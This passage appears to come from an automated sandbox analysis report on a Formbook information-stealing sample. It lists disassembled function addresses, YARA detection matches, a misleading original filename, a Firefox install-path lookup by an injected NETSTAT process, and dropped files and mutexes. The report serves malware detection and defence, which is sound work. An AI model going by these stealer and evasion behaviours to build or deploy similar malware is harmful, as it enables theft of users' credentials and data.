Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F4919E210_2_1F4919E2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F618010_2_1F3F6180
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F49D9BE10_2_1F49D9BE
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F002110_2_1F3F0021
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3FE02010_2_1F3FE020
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F981010_2_1F3F9810
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F107010_2_1F3F1070
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F48D01610_2_1F48D016
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F4928E810_2_1F4928E8
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3DA08010_2_1F3DA080
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F4718B610_2_1F4718B6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F48CB10_2_1F3F48CB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_004F2BF210_2_004F2BF2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5D1FCE12_2_1F5D1FCE
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F50BFF612_2_1F50BFF6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F537FED12_2_1F537FED
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F535E7012_2_1F535E70
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F534E6112_2_1F534E61
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5CCE6612_2_1F5CCE66
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5C3E9612_2_1F5C3E96
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F500D4012_2_1F500D40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5C1D1B12_2_1F5C1D1B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5BFDDB12_2_1F5BFDDB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5B1DE312_2_1F5B1DE3
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F533C0012_2_1F533C00
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5CDCC512_2_1F5CDCC5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F510CF512_2_1F510CF5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5D1C9F12_2_1F5D1C9F
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5D2C9A12_2_1F5D2C9A
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F52FB4012_2_1F52FB40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F528B0012_2_1F528B00
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F50EBE012_2_1F50EBE0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F534B9612_2_1F534B96
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F534A5B12_2_1F534A5B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5C0A0212_2_1F5C0A02
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5C5AF212_2_1F5C5AF2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5D1A9912_2_1F5D1A99
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F53594B12_2_1F53594B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F55990612_2_1F559906
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5D19E212_2_1F5D19E2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5DD9BE12_2_1F5DD9BE
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F58A86012_2_1F58A860
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F53981012_2_1F539810
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5348CB12_2_1F5348CB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5D28E812_2_1F5D28E8
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5088B012_2_1F5088B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5B18B612_2_1F5B18B6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F52874012_2_1F528740
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5D174612_2_1F5D1746
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5067D012_2_1F5067D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F52579012_2_1F525790
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5C278212_2_1F5C2782
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F52764012_2_1F527640
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5CC67712_2_1F5CC677
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F53661112_2_1F536611
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F50963012_2_1F509630
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5D26F812_2_1F5D26F8
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5D251912_2_1F5D2519
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F52153012_2_1F521530
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5AC53F12_2_1F5AC53F
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5CD5D212_2_1F5CD5D2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5AE58A12_2_1F5AE58A
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5CE58112_2_1F5CE581
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5C544C12_2_1F5C544C
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F53547E12_2_1F53547E
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F52141012_2_1F521410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F51740C12_2_1F51740C
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5BF42B12_2_1F5BF42B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5C44EF12_2_1F5C44EF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5C349012_2_1F5C3490
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5363C212_2_1F5363C2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5333B412_2_1F5333B4
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5DE21412_2_1F5DE214
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F53523D12_2_1F53523D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5D22DD12_2_1F5D22DD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5242B012_2_1F5242B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F52911012_2_1F529110
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F53711012_2_1F537110
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5C61DF12_2_1F5C61DF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5BE1FF12_2_1F5BE1FF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5281E012_2_1F5281E0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F53618012_2_1F536180
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F51B1B012_2_1F51B1B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F53107012_2_1F531070
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5CD01612_2_1F5CD016
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F53002112_2_1F530021
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F53E02012_2_1F53E020
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F5140CC12_2_1F5140CC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F51A08012_2_1F51A080
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F2BF212_2_004F2BF2
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B2BF223_2_021B2BF2
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 24_2_004F2BF224_2_004F2BF2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F2BF225_2_020F2BF2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E1FCE26_2_1F5E1FCE
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F51BFF626_2_1F51BFF6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F547FED26_2_1F547FED
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54FFA026_2_1F54FFA0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F545E7026_2_1F545E70
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D7E3D26_2_1F5D7E3D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D3E9626_2_1F5D3E96
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D1D1B26_2_1F5D1D1B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5CFDDB26_2_1F5CFDDB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5C1DE326_2_1F5C1DE3
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F543C0026_2_1F543C00
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5DDCC526_2_1F5DDCC5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E1C9F26_2_1F5E1C9F
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53FB4026_2_1F53FB40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F543B4026_2_1F543B40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F533BD026_2_1F533BD0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D5AF226_2_1F5D5AF2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E1A9926_2_1F5E1A99
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54594B26_2_1F54594B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F56990626_2_1F569906
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5999C026_2_1F5999C0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E19E226_2_1F5E19E2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5ED9BE26_2_1F5ED9BE
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54981026_2_1F549810
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5C18B626_2_1F5C18B6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E174626_2_1F5E1746
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D776426_2_1F5D7764
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53579026_2_1F535790
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53764026_2_1F537640
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F51963026_2_1F519630
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D951A26_2_1F5D951A
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53153026_2_1F531530
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5DD5D226_2_1F5DD5D2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D544C26_2_1F5D544C
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54547E26_2_1F54547E
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53141026_2_1F531410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F52740C26_2_1F52740C
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5CF42B26_2_1F5CF42B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F59B49026_2_1F59B490
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D349026_2_1F5D3490
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F56D34026_2_1F56D340
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5BB34026_2_1F5BB340
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F56531D26_2_1F56531D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F4F331426_2_1F4F3314
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5433B426_2_1F5433B4
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54523D26_2_1F54523D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53911026_2_1F539110
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54711026_2_1F547110
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D71DD26_2_1F5D71DD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F52B1B026_2_1F52B1B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54107026_2_1F541070
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5DD01626_2_1F5DD016
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5910CF26_2_1F5910CF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5A8F3226_2_1F5A8F32
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5C4FE026_2_1F5C4FE0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5C0F9F26_2_1F5C0F9F
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5A6E4026_2_1F5A6E40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F544E6126_2_1F544E61
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5DCE6626_2_1F5DCE66
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5A4E2026_2_1F5A4E20
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F56CED026_2_1F56CED0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F510D4026_2_1F510D40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F550D6F26_2_1F550D6F
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F520CF526_2_1F520CF5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E2C9A26_2_1F5E2C9A
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5ACC8B26_2_1F5ACC8B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F538B0026_2_1F538B00
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F51EBE026_2_1F51EBE0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F544B9626_2_1F544B96
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F544A5B26_2_1F544A5B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5C8A4926_2_1F5C8A49
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D0A0226_2_1F5D0A02
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55C87C26_2_1F55C87C
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F59A86026_2_1F59A860
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5448CB26_2_1F5448CB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E28E826_2_1F5E28E8
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5B68E026_2_1F5B68E0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54289026_2_1F542890
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5188B026_2_1F5188B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5EC75526_2_1F5EC755
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F53874026_2_1F538740
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5167D026_2_1F5167D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D278226_2_1F5D2782
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5DC67726_2_1F5DC677
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54661126_2_1F546611
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E26F826_2_1F5E26F8
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E251926_2_1F5E2519
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5BC53F26_2_1F5BC53F
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5BE58A26_2_1F5BE58A
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5DE58126_2_1F5DE581
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5A645026_2_1F5A6450
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F59844826_2_1F598448
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D44EF26_2_1F5D44EF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D833626_2_1F5D8336
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5463C226_2_1F5463C2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5EE21426_2_1F5EE214
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5E22DD26_2_1F5E22DD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5342B026_2_1F5342B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5D61DF26_2_1F5D61DF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5CE1FF26_2_1F5CE1FF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5CC1F026_2_1F5CC1F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5381E026_2_1F5381E0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54618026_2_1F546180
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5BA06026_2_1F5BA060
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5C606026_2_1F5C6060
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54E02026_2_1F54E020
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F54002126_2_1F540021
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F5240CC26_2_1F5240CC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F52A08026_2_1F52A080
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F2BF226_2_004F2BF2
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F51B0E0 appears 264 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F55C840 appears 53 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F3DB0E0 appears 176 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F595110 appears 81 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F50B0E0 appears 228 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F55DDE8 appears 64 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F455110 appears 48 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F41DDE8 appears 49 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F56DDE8 appears 99 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F584F10 appears 39 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F465110 appears 40 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F42DDE8 appears 49 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F56DE44 appears 46 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F594F10 appears 80 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F5A5110 appears 95 times
Source: C:\Users\user\subfolder1\filename1.exeCode function: String function: 1F3CB0E0 appears 176 times
PE file contains strange resourcesShow sources
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe, 00000000.00000002.772452885.0000000000418000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameClockosci4.exe vs #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe, 00000001.00000002.778986842.0000000002378000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClockosci4.exe vs #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe, 00000001.00000002.786678620.000000001E990000.00000002.00000001.sdmpBinary or memory string: originalfilename vs #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe, 00000001.00000002.786678620.000000001E990000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe, 00000001.00000002.786337136.000000001E890000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeBinary or memory string: OriginalFilenameClockosci4.exe vs #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Windows\SysWOW64\NETSTAT.EXERegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Yara signature matchShow sources
Source: 00000005.00000002.936093552.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.936093552.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.896346552.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.896346552.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.931730236.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.931730236.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001A.00000002.1277253347.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001A.00000002.1277253347.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001A.00000002.1282450545.000000001F2B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001A.00000002.1282450545.000000001F2B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.890369559.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.890369559.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.901044828.000000000D3B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.914336084.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.914336084.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.922687997.000000001F2B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.922687997.000000001F2B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@35/12@49/5
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeFile created: C:\Users\user\subfolder1Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\T7nhhuJump to behavior
